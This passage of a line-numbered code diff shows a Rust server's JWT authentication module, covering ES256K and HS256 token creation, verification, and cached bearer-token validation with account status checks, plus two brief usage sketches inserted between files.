pub iss: String,
···
214
pub lxm: Option<String>,
215
pub jti: String,
216
}
217
#[derive(Debug, Serialize, Deserialize)]
218
pub struct Header {
219
pub alg: String,
220
pub typ: String,
221
}
222
#[derive(Debug, Serialize, Deserialize)]
223
pub struct UnsafeClaims {
224
pub iss: String,
225
pub sub: Option<String>,
226
}
227
-
// Minimal TokenData equivalent kept for structural compatibility
228
pub struct TokenData<T> {
229
pub claims: T,
230
}
···
3
use std::fmt;
4
use std::sync::Arc;
5
use std::time::Duration;
6
+
7
use crate::cache::Cache;
8
+
9
pub mod extractor;
10
pub mod token;
11
pub mod verify;
12
+
13
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
14
pub use token::{
15
create_access_token, create_refresh_token, create_service_token,
···
19
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
20
};
21
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
22
+
23
const KEY_CACHE_TTL_SECS: u64 = 300;
24
const SESSION_CACHE_TTL_SECS: u64 = 60;
25
+
26
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
27
pub enum TokenValidationError {
28
AccountDeactivated,
···
30
KeyDecryptionFailed,
31
AuthenticationFailed,
32
}
33
+
34
impl fmt::Display for TokenValidationError {
35
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
36
match self {
···
41
}
42
}
43
}
44
+
45
pub struct AuthenticatedUser {
46
pub did: String,
47
pub key_bytes: Option<Vec<u8>>,
48
pub is_oauth: bool,
49
}
50
+
51
pub async fn validate_bearer_token(
52
db: &PgPool,
53
token: &str,
54
) -> Result<AuthenticatedUser, TokenValidationError> {
55
validate_bearer_token_with_options_internal(db, None, token, false).await
56
}
57
+
58
pub async fn validate_bearer_token_allow_deactivated(
59
db: &PgPool,
60
token: &str,
61
) -> Result<AuthenticatedUser, TokenValidationError> {
62
validate_bearer_token_with_options_internal(db, None, token, true).await
63
}
64
+
65
pub async fn validate_bearer_token_cached(
66
db: &PgPool,
67
cache: &Arc<dyn Cache>,
···
69
) -> Result<AuthenticatedUser, TokenValidationError> {
70
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
71
}
72
+
73
pub async fn validate_bearer_token_cached_allow_deactivated(
74
db: &PgPool,
75
cache: &Arc<dyn Cache>,
···
77
) -> Result<AuthenticatedUser, TokenValidationError> {
78
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
79
}
80
+
81
async fn validate_bearer_token_with_options_internal(
82
db: &PgPool,
83
cache: Option<&Arc<dyn Cache>>,
···
85
allow_deactivated: bool,
86
) -> Result<AuthenticatedUser, TokenValidationError> {
87
let did_from_token = get_did_from_token(token).ok();
88
+
89
if let Some(ref did) = did_from_token {
90
let key_cache_key = format!("auth:key:{}", did);
91
let mut cached_key: Option<Vec<u8>> = None;
92
+
93
if let Some(c) = cache {
94
cached_key = c.get_bytes(&key_cache_key).await;
95
if cached_key.is_some() {
···
98
crate::metrics::record_auth_cache_miss("key");
99
}
100
}
101
+
102
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
103
let user_status = sqlx::query!(
104
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
108
.await
109
.ok()
110
.flatten();
111
+
112
match user_status {
113
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
114
None => (None, None, None),
···
128
{
129
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
130
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
131
+
132
if let Some(c) = cache {
133
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
134
}
135
+
136
(Some(key), user.deactivated_at, user.takedown_ref)
137
} else {
138
(None, None, None)
139
}
140
};
141
+
142
if let Some(decrypted_key) = decrypted_key {
143
if !allow_deactivated && deactivated_at.is_some() {
144
return Err(TokenValidationError::AccountDeactivated);
145
}
146
+
147
if takedown_ref.is_some() {
148
return Err(TokenValidationError::AccountTakedown);
149
}
150
+
151
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
152
let jti = &token_data.claims.jti;
153
let session_cache_key = format!("auth:session:{}:{}", did, jti);
154
let mut session_valid = false;
155
+
156
if let Some(c) = cache {
157
if let Some(cached_value) = c.get(&session_cache_key).await {
158
session_valid = cached_value == "1";
···
161
crate::metrics::record_auth_cache_miss("session");
162
}
163
}
164
+
165
if !session_valid {
166
let session_exists = sqlx::query_scalar!(
167
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
172
.await
173
.ok()
174
.flatten();
175
+
176
session_valid = session_exists.is_some();
177
+
178
if session_valid {
179
if let Some(c) = cache {
180
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
181
}
182
}
183
}
184
+
185
if session_valid {
186
return Ok(AuthenticatedUser {
187
did: did.clone(),
···
192
}
193
}
194
}
195
+
196
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
197
if let Some(oauth_token) = sqlx::query!(
198
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
209
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
210
return Err(TokenValidationError::AccountDeactivated);
211
}
212
+
213
if oauth_token.takedown_ref.is_some() {
214
return Err(TokenValidationError::AccountTakedown);
215
}
216
+
217
let now = chrono::Utc::now();
218
if oauth_token.expires_at > now {
219
return Ok(AuthenticatedUser {
···
224
}
225
}
226
}
227
+
228
Err(TokenValidationError::AuthenticationFailed)
229
}
230
+
231
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
232
let key_cache_key = format!("auth:key:{}", did);
233
let _ = cache.delete(&key_cache_key).await;
234
}
235
+
236
#[derive(Debug, Serialize, Deserialize)]
237
pub struct Claims {
238
pub iss: String,
···
246
pub lxm: Option<String>,
247
pub jti: String,
248
}
249
+
250
#[derive(Debug, Serialize, Deserialize)]
251
pub struct Header {
252
pub alg: String,
253
pub typ: String,
254
}
255
+
256
#[derive(Debug, Serialize, Deserialize)]
257
pub struct UnsafeClaims {
258
pub iss: String,
259
pub sub: Option<String>,
260
}
261
+
262
pub struct TokenData<T> {
263
pub claims: T,
264
}
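Not part of the diff, just a usage sketch: how a request handler might call the cached validator defined above in src/auth/mod.rs. The helper names and the way the pool and cache reach them are invented; only the validate_bearer_token_cached and invalidate_auth_cache calls come from the file itself.

use std::sync::Arc;
use sqlx::PgPool;

// Hypothetical handler-side helper (names invented for illustration).
async fn authenticate_request(
    pool: &PgPool,
    cache: &Arc<dyn Cache>,
    token: &str,
) -> Result<AuthenticatedUser, TokenValidationError> {
    // Consults the 300s key cache and 60s session cache before touching Postgres.
    validate_bearer_token_cached(pool, cache, token).await
}

// After a password change or signing-key rotation, drop the cached key so the
// key cache cannot keep validating tokens against stale material.
async fn on_credentials_changed(cache: &Arc<dyn Cache>, did: &str) {
    invalidate_auth_cache(cache, did).await;
}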
+42
src/auth/token.rs
···
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
use sha2::Sha256;
9
use uuid;
10
type HmacSha256 = Hmac<Sha256>;
11
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
12
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
13
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
15
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
16
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
17
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
18
pub struct TokenWithMetadata {
19
pub token: String,
20
pub jti: String,
21
pub expires_at: DateTime<Utc>,
22
}
23
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
24
Ok(create_access_token_with_metadata(did, key_bytes)?.token)
25
}
26
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
27
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
28
}
29
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
30
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
31
}
32
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
33
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
34
}
35
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
36
let signing_key = SigningKey::from_slice(key_bytes)?;
37
let expiration = Utc::now()
38
.checked_add_signed(Duration::seconds(60))
39
.expect("valid timestamp")
40
.timestamp();
41
let claims = Claims {
42
iss: did.to_owned(),
43
sub: did.to_owned(),
···
48
lxm: Some(lxm.to_string()),
49
jti: uuid::Uuid::new_v4().to_string(),
50
};
51
sign_claims(claims, &signing_key)
52
}
53
fn create_signed_token_with_metadata(
54
did: &str,
55
scope: &str,
···
58
duration: Duration,
59
) -> Result<TokenWithMetadata> {
60
let signing_key = SigningKey::from_slice(key_bytes)?;
61
let expires_at = Utc::now()
62
.checked_add_signed(duration)
63
.expect("valid timestamp");
64
let expiration = expires_at.timestamp();
65
let jti = uuid::Uuid::new_v4().to_string();
66
let claims = Claims {
67
iss: did.to_owned(),
68
sub: did.to_owned(),
···
76
lxm: None,
77
jti: jti.clone(),
78
};
79
let token = sign_claims_with_type(claims, &signing_key, typ)?;
80
Ok(TokenWithMetadata {
81
token,
82
jti,
83
expires_at,
84
})
85
}
86
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
87
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
88
}
89
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
90
let header = Header {
91
alg: "ES256K".to_string(),
92
typ: typ.to_string(),
93
};
94
let header_json = serde_json::to_string(&header)?;
95
let claims_json = serde_json::to_string(&claims)?;
96
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
97
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
98
let message = format!("{}.{}", header_b64, claims_b64);
99
let signature: Signature = key.sign(message.as_bytes());
100
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
101
Ok(format!("{}.{}", message, signature_b64))
102
}
103
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
104
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
105
}
106
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
107
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
108
}
109
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
110
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
111
}
112
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
113
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
114
}
115
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
116
let expiration = Utc::now()
117
.checked_add_signed(Duration::seconds(60))
118
.expect("valid timestamp")
119
.timestamp();
120
let claims = Claims {
121
iss: did.to_owned(),
122
sub: did.to_owned(),
···
127
lxm: Some(lxm.to_string()),
128
jti: uuid::Uuid::new_v4().to_string(),
129
};
130
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
131
}
132
fn create_hs256_token_with_metadata(
133
did: &str,
134
scope: &str,
···
139
let expires_at = Utc::now()
140
.checked_add_signed(duration)
141
.expect("valid timestamp");
142
let expiration = expires_at.timestamp();
143
let jti = uuid::Uuid::new_v4().to_string();
144
let claims = Claims {
145
iss: did.to_owned(),
146
sub: did.to_owned(),
···
154
lxm: None,
155
jti: jti.clone(),
156
};
157
let token = sign_claims_hs256(claims, typ, secret)?;
158
Ok(TokenWithMetadata {
159
token,
160
jti,
161
expires_at,
162
})
163
}
164
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
165
let header = Header {
166
alg: "HS256".to_string(),
167
typ: typ.to_string(),
168
};
169
let header_json = serde_json::to_string(&header)?;
170
let claims_json = serde_json::to_string(&claims)?;
171
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
172
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
173
let message = format!("{}.{}", header_b64, claims_b64);
174
let mut mac = HmacSha256::new_from_slice(secret)
175
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
176
mac.update(message.as_bytes());
177
let signature = mac.finalize().into_bytes();
178
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
179
Ok(format!("{}.{}", message, signature_b64))
180
}
···
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
use sha2::Sha256;
9
use uuid;
10
+
11
type HmacSha256 = Hmac<Sha256>;
12
+
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
15
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
17
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
18
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
19
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
20
+
21
pub struct TokenWithMetadata {
22
pub token: String,
23
pub jti: String,
24
pub expires_at: DateTime<Utc>,
25
}
26
+
27
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
28
Ok(create_access_token_with_metadata(did, key_bytes)?.token)
29
}
30
+
31
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
32
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
33
}
34
+
35
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
36
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
37
}
38
+
39
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
40
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
41
}
42
+
43
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
44
let signing_key = SigningKey::from_slice(key_bytes)?;
45
+
46
let expiration = Utc::now()
47
.checked_add_signed(Duration::seconds(60))
48
.expect("valid timestamp")
49
.timestamp();
50
+
51
let claims = Claims {
52
iss: did.to_owned(),
53
sub: did.to_owned(),
···
58
lxm: Some(lxm.to_string()),
59
jti: uuid::Uuid::new_v4().to_string(),
60
};
61
+
62
sign_claims(claims, &signing_key)
63
}
64
+
65
fn create_signed_token_with_metadata(
66
did: &str,
67
scope: &str,
···
70
duration: Duration,
71
) -> Result<TokenWithMetadata> {
72
let signing_key = SigningKey::from_slice(key_bytes)?;
73
+
74
let expires_at = Utc::now()
75
.checked_add_signed(duration)
76
.expect("valid timestamp");
77
+
78
let expiration = expires_at.timestamp();
79
let jti = uuid::Uuid::new_v4().to_string();
80
+
81
let claims = Claims {
82
iss: did.to_owned(),
83
sub: did.to_owned(),
···
91
lxm: None,
92
jti: jti.clone(),
93
};
94
+
95
let token = sign_claims_with_type(claims, &signing_key, typ)?;
96
+
97
Ok(TokenWithMetadata {
98
token,
99
jti,
100
expires_at,
101
})
102
}
103
+
104
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
105
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
106
}
107
+
108
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
109
let header = Header {
110
alg: "ES256K".to_string(),
111
typ: typ.to_string(),
112
};
113
+
114
let header_json = serde_json::to_string(&header)?;
115
let claims_json = serde_json::to_string(&claims)?;
116
+
117
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
118
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
119
+
120
let message = format!("{}.{}", header_b64, claims_b64);
121
let signature: Signature = key.sign(message.as_bytes());
122
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
123
+
124
Ok(format!("{}.{}", message, signature_b64))
125
}
126
+
127
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
128
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
129
}
130
+
131
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
132
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
133
}
134
+
135
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
136
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
137
}
138
+
139
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
140
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
141
}
142
+
143
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
144
let expiration = Utc::now()
145
.checked_add_signed(Duration::seconds(60))
146
.expect("valid timestamp")
147
.timestamp();
148
+
149
let claims = Claims {
150
iss: did.to_owned(),
151
sub: did.to_owned(),
···
156
lxm: Some(lxm.to_string()),
157
jti: uuid::Uuid::new_v4().to_string(),
158
};
159
+
160
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
161
}
162
+
163
fn create_hs256_token_with_metadata(
164
did: &str,
165
scope: &str,
···
170
let expires_at = Utc::now()
171
.checked_add_signed(duration)
172
.expect("valid timestamp");
173
+
174
let expiration = expires_at.timestamp();
175
let jti = uuid::Uuid::new_v4().to_string();
176
+
177
let claims = Claims {
178
iss: did.to_owned(),
179
sub: did.to_owned(),
···
187
lxm: None,
188
jti: jti.clone(),
189
};
190
+
191
let token = sign_claims_hs256(claims, typ, secret)?;
192
+
193
Ok(TokenWithMetadata {
194
token,
195
jti,
196
expires_at,
197
})
198
}
199
+
200
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
201
let header = Header {
202
alg: "HS256".to_string(),
203
typ: typ.to_string(),
204
};
205
+
206
let header_json = serde_json::to_string(&header)?;
207
let claims_json = serde_json::to_string(&claims)?;
208
+
209
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
210
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
211
+
212
let message = format!("{}.{}", header_b64, claims_b64);
213
+
214
let mut mac = HmacSha256::new_from_slice(secret)
215
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
216
mac.update(message.as_bytes());
217
+
218
let signature = mac.finalize().into_bytes();
219
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
220
+
221
Ok(format!("{}.{}", message, signature_b64))
222
}
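A quick illustration (not in the diff) of minting a session's token pair with the HS256 helpers above; the ES256K path is the same shape except that the per-user secp256k1 key bytes are passed instead of a shared secret. The function name is invented, and the note about session_tokens is inferred from the lookup query in src/auth/mod.rs.

// Sketch only: mint a 120-minute access token and a 90-day refresh token for `did`.
fn mint_session_tokens_hs256(
    did: &str,
    secret: &[u8],
) -> anyhow::Result<(TokenWithMetadata, TokenWithMetadata)> {
    let access = create_access_token_hs256_with_metadata(did, secret)?;
    let refresh = create_refresh_token_hs256_with_metadata(did, secret)?;

    // Each token carries its own jti; jti and expires_at are what the session
    // store later matches against (see the session_tokens query in src/auth/mod.rs).
    assert_ne!(access.jti, refresh.jti);
    Ok((access, refresh))
}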
+48
src/auth/verify.rs
···
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
use sha2::Sha256;
10
use subtle::ConstantTimeEq;
11
type HmacSha256 = Hmac<Sha256>;
12
pub fn get_did_from_token(token: &str) -> Result<String, String> {
13
let parts: Vec<&str> = token.split('.').collect();
14
if parts.len() != 3 {
15
return Err("Invalid token format".to_string());
16
}
17
let payload_bytes = URL_SAFE_NO_PAD
18
.decode(parts[1])
19
.map_err(|e| format!("Base64 decode failed: {}", e))?;
20
let claims: UnsafeClaims =
21
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
22
Ok(claims.sub.unwrap_or(claims.iss))
23
}
24
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
25
let parts: Vec<&str> = token.split('.').collect();
26
if parts.len() != 3 {
27
return Err("Invalid token format".to_string());
28
}
29
let payload_bytes = URL_SAFE_NO_PAD
30
.decode(parts[1])
31
.map_err(|e| format!("Base64 decode failed: {}", e))?;
32
let claims: serde_json::Value =
33
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
34
claims.get("jti")
35
.and_then(|j| j.as_str())
36
.map(|s| s.to_string())
37
.ok_or_else(|| "No jti claim in token".to_string())
38
}
39
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
40
verify_token_internal(token, key_bytes, None, None)
41
}
42
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
43
verify_token_internal(
44
token,
···
47
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
48
)
49
}
50
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
51
verify_token_internal(
52
token,
···
55
Some(&[SCOPE_REFRESH]),
56
)
57
}
58
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
59
verify_token_hs256_internal(
60
token,
···
63
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
64
)
65
}
66
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
67
verify_token_hs256_internal(
68
token,
···
71
Some(&[SCOPE_REFRESH]),
72
)
73
}
74
fn verify_token_internal(
75
token: &str,
76
key_bytes: &[u8],
···
81
if parts.len() != 3 {
82
return Err(anyhow!("Invalid token format"));
83
}
84
let header_b64 = parts[0];
85
let claims_b64 = parts[1];
86
let signature_b64 = parts[2];
87
let header_bytes = URL_SAFE_NO_PAD
88
.decode(header_b64)
89
.context("Base64 decode of header failed")?;
90
let header: Header =
91
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
92
if let Some(expected) = expected_typ {
93
if header.typ != expected {
94
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
95
}
96
}
97
let signature_bytes = URL_SAFE_NO_PAD
98
.decode(signature_b64)
99
.context("Base64 decode of signature failed")?;
100
let signature = Signature::from_slice(&signature_bytes)
101
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
102
let signing_key = SigningKey::from_slice(key_bytes)?;
103
let verifying_key = VerifyingKey::from(&signing_key);
104
let message = format!("{}.{}", header_b64, claims_b64);
105
verifying_key
106
.verify(message.as_bytes(), &signature)
107
.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
108
let claims_bytes = URL_SAFE_NO_PAD
109
.decode(claims_b64)
110
.context("Base64 decode of claims failed")?;
111
let claims: Claims =
112
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
113
let now = Utc::now().timestamp() as usize;
114
if claims.exp < now {
115
return Err(anyhow!("Token expired"));
116
}
117
if let Some(scopes) = allowed_scopes {
118
let token_scope = claims.scope.as_deref().unwrap_or("");
119
if !scopes.contains(&token_scope) {
120
return Err(anyhow!("Invalid token scope: {}", token_scope));
121
}
122
}
123
Ok(TokenData { claims })
124
}
125
fn verify_token_hs256_internal(
126
token: &str,
127
secret: &[u8],
···
132
if parts.len() != 3 {
133
return Err(anyhow!("Invalid token format"));
134
}
135
let header_b64 = parts[0];
136
let claims_b64 = parts[1];
137
let signature_b64 = parts[2];
138
let header_bytes = URL_SAFE_NO_PAD
139
.decode(header_b64)
140
.context("Base64 decode of header failed")?;
141
let header: Header =
142
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
143
if header.alg != "HS256" {
144
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
145
}
146
if let Some(expected) = expected_typ {
147
if header.typ != expected {
148
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
149
}
150
}
151
let signature_bytes = URL_SAFE_NO_PAD
152
.decode(signature_b64)
153
.context("Base64 decode of signature failed")?;
154
let message = format!("{}.{}", header_b64, claims_b64);
155
let mut mac = HmacSha256::new_from_slice(secret)
156
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
157
mac.update(message.as_bytes());
158
let expected_signature = mac.finalize().into_bytes();
159
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
160
if !is_valid {
161
return Err(anyhow!("Signature verification failed"));
162
}
163
let claims_bytes = URL_SAFE_NO_PAD
164
.decode(claims_b64)
165
.context("Base64 decode of claims failed")?;
166
let claims: Claims =
167
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
168
let now = Utc::now().timestamp() as usize;
169
if claims.exp < now {
170
return Err(anyhow!("Token expired"));
171
}
172
if let Some(scopes) = allowed_scopes {
173
let token_scope = claims.scope.as_deref().unwrap_or("");
174
if !scopes.contains(&token_scope) {
175
return Err(anyhow!("Invalid token scope: {}", token_scope));
176
}
177
}
178
Ok(TokenData { claims })
179
}
180
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
181
let parts: Vec<&str> = token.split('.').collect();
182
if parts.len() != 3 {
183
return Err("Invalid token format".to_string());
184
}
185
let header_bytes = URL_SAFE_NO_PAD
186
.decode(parts[0])
187
.map_err(|e| format!("Base64 decode failed: {}", e))?;
188
let header: Header =
189
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
190
Ok(header.alg)
191
}
···
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
use sha2::Sha256;
10
use subtle::ConstantTimeEq;
11
+
12
type HmacSha256 = Hmac<Sha256>;
13
+
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
15
let parts: Vec<&str> = token.split('.').collect();
16
if parts.len() != 3 {
17
return Err("Invalid token format".to_string());
18
}
19
+
20
let payload_bytes = URL_SAFE_NO_PAD
21
.decode(parts[1])
22
.map_err(|e| format!("Base64 decode failed: {}", e))?;
23
+
24
let claims: UnsafeClaims =
25
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
26
+
27
Ok(claims.sub.unwrap_or(claims.iss))
28
}
29
+
30
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
31
let parts: Vec<&str> = token.split('.').collect();
32
if parts.len() != 3 {
33
return Err("Invalid token format".to_string());
34
}
35
+
36
let payload_bytes = URL_SAFE_NO_PAD
37
.decode(parts[1])
38
.map_err(|e| format!("Base64 decode failed: {}", e))?;
39
+
40
let claims: serde_json::Value =
41
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
42
+
43
claims.get("jti")
44
.and_then(|j| j.as_str())
45
.map(|s| s.to_string())
46
.ok_or_else(|| "No jti claim in token".to_string())
47
}
48
+
49
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
50
verify_token_internal(token, key_bytes, None, None)
51
}
52
+
53
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
54
verify_token_internal(
55
token,
···
58
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
59
)
60
}
61
+
62
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
63
verify_token_internal(
64
token,
···
67
Some(&[SCOPE_REFRESH]),
68
)
69
}
70
+
71
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
72
verify_token_hs256_internal(
73
token,
···
76
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
77
)
78
}
79
+
80
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
81
verify_token_hs256_internal(
82
token,
···
85
Some(&[SCOPE_REFRESH]),
86
)
87
}
88
+
89
fn verify_token_internal(
90
token: &str,
91
key_bytes: &[u8],
···
96
if parts.len() != 3 {
97
return Err(anyhow!("Invalid token format"));
98
}
99
+
100
let header_b64 = parts[0];
101
let claims_b64 = parts[1];
102
let signature_b64 = parts[2];
103
+
104
let header_bytes = URL_SAFE_NO_PAD
105
.decode(header_b64)
106
.context("Base64 decode of header failed")?;
107
+
108
let header: Header =
109
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
110
+
111
if let Some(expected) = expected_typ {
112
if header.typ != expected {
113
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
114
}
115
}
116
+
117
let signature_bytes = URL_SAFE_NO_PAD
118
.decode(signature_b64)
119
.context("Base64 decode of signature failed")?;
120
+
121
let signature = Signature::from_slice(&signature_bytes)
122
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
123
+
124
let signing_key = SigningKey::from_slice(key_bytes)?;
125
let verifying_key = VerifyingKey::from(&signing_key);
126
+
127
let message = format!("{}.{}", header_b64, claims_b64);
128
verifying_key
129
.verify(message.as_bytes(), &signature)
130
